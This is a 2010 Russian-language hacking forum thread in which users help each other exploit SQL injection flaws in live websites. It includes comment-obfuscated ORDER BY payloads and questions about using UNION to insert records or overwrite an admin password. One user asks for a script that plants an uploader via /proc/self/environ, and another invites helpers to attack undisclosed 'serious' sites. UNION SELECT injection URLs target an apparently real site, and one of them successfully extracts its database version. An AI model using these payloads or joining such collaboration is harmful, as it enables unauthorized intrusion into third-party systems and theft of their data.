06.02.2010, 20:47
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от auth_root
Ошибка.
Добавляется ,20 ,не получается закомментировать запрос. Все перебрал.
Где то тут видел подобный вопрос, не могу найти,возможно уже отвечали.
More адын row и подзапросы крайне неудобно юзать. Возможно иньекция в лимите? При таком раскладе крутить только подзапросами, либо есть альтернативный способ?
/*...
You have an error in your SQL syntax near 'order by 1+--+-,20' at line 18
Делай /**/order/**/by/**/1/*
|
|
|
06.02.2010, 20:51
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
С нами:
8566197
Репутация:
18
|
|
Прикалываешься? =) Я всё перепробовал.Запрос не режется, при чём тут... Фильтрации нет на +, так я пробовал в первую очередь.
?id=10/**/OrDeR/**/bY/**/1/*&print=1
и так тоже пробовал.
Кто хочет помочь поковырять-в пм.Дам линк.Но не со вчерашней регой.Ресурсы серьёзные.
Последний раз редактировалось auth_root; 06.02.2010 в 21:10..
|
|
|
|
06.02.2010, 22:39
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от auth_root
More адын row и подзапросы крайне неудобно юзать. Возможно иньекция в лимите? При таком раскладе крутить только подзапросами, либо есть альтернативный способ?
Если инъекция в лимите (а судя по ошибке так оно и есть), то ни о каких подзапросах речи быть не может.
Единственный вариант если там нет order by то расскручивать как обычно, или если file_priv = Y
https://forum.antichat.ru/showpost.php?p=1305000&postcount=125
Других нет
Сообщение от auth_root
Запрос не режется
С чего ты взял? Хотя это не важно
Последний раз редактировалось jokester; 06.02.2010 в 23:10..
|
|
|
|
07.02.2010, 00:28
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
Подскажите плиз.
Есть скуля на сайте где стоит форум IPB, допустим в бажном скрипте такой запрос
SELECT * FROM news WHERE id='$_GET[id]'
могу ли так сделать
SELECT * FR0M news WHERE id='1' + UNION + INSERT into members (bla,bla,...) VALUES (bla,bla,...);
т.е. вместо UNION SELECT написать другое например UNION INSERT или UNION DELETE , или с помощью UNION можно только SELECT юзать?
|
|
|
|
07.02.2010, 00:41
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от scorpic393
Подскажите плиз.
Есть скуля на сайте где стоит форум IPB, допустим в бажном скрипте такой запрос
SELECT * FROM news WHERE id='$_GET[id]'
могу ли так сделать
SELECT * FR0M news WHERE id='1' + UNION + INSERT into members (bla,bla,...) VALUES (bla,bla,...);
т.е. вместо UNION SELECT написать другое например UNION INSERT или UNION DELETE , или с помощью UNION можно только SELECT юзать?
только select
|
|
|
|
07.02.2010, 00:46
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
Сообщение от попугай
только select
спс, ясн, я так понял это зависит от левой части запроса.
т.е. если бы был запрос таким UPDATE SET bla bla WHERE bla=$_GET[bla] то тогда можно бы было обновить БД
так UPDATE SET bla bla WHERE bla=$_GET[bla]+UNION UPDATE set admin_pass=admin
я правильно понял?
п.с. я помню ты скинул давно был мне скрипт для залития аплоадера через /proc/self/environ я бы был искренее благодарен если бы ты его выложил ещё раз плиз
|
|
|
|
07.02.2010, 01:10
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
UNION используется для обьединения вывода двух или более запросов SELECT.
Есть винрарная статья 1dt.w0lf'a: http://www.inattack.ru/article/220.html
Кое-что процитирую:
Сообщение от 1dt.w0lf
Итак, команда UNION используется для обьединения вывода двух или более запросов SELECT.
Особенности команды которые придется учитывать:
Когда два (или более) запроса подвергаются объединению, их столбцы вывода должны
быть совместимы для объединения. Это означает, что каждый запрос должен
указывать одинаковое количество столбцов и в том же порядке и каждый должен
иметь тип, совместимый с каждым.
Также данная возможность появилать только в mysql версии 4.0 т.е. на более
ранних версиях БД работать не будет.
Вид команды таков:
SELECT a1, a2, a3 FROM table1 UNION SELECT b1, b2, b3 FROM table2;
Где a1 и b1, a2 и b2, a3 и b3 должны быть одинакового типа.
Например:
SELECT text11, text12, int11 FROM t1 UNION SELECT text21, text22, int22 FROM t2;
|
|
|
|
07.02.2010, 01:28
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
http://www.mysql.ru/docs/man/UNION.html
лучше конечно от производителя почитать маны, но они ведь на буржуйском  |
|
|
|
07.02.2010, 04:33
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
Подобрал колво стоблбцов
http://wwwsdfsdfsdfsd.e-amwsfsdfsdfsdfay.ru/index.php?id=3)+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
но вывод так не получесться
http://www.e-sfsdfsdfsdfamway.ru/index.php?id=-3)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+--+
в чём трабла? помогите плиз
Последний раз редактировалось scorpic393; 07.02.2010 в 12:59..
|
|
|
|
07.02.2010, 12:57
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
http://www.e-amway.ru/index.php?id=3)+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22 ,23,24,25--+
SQL: SELECT fullname FROM `b10780_eamway`.etomite_user_attributes WHERE `b10780_eamway`.etomite_user_attributes.id = 5.0.67
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
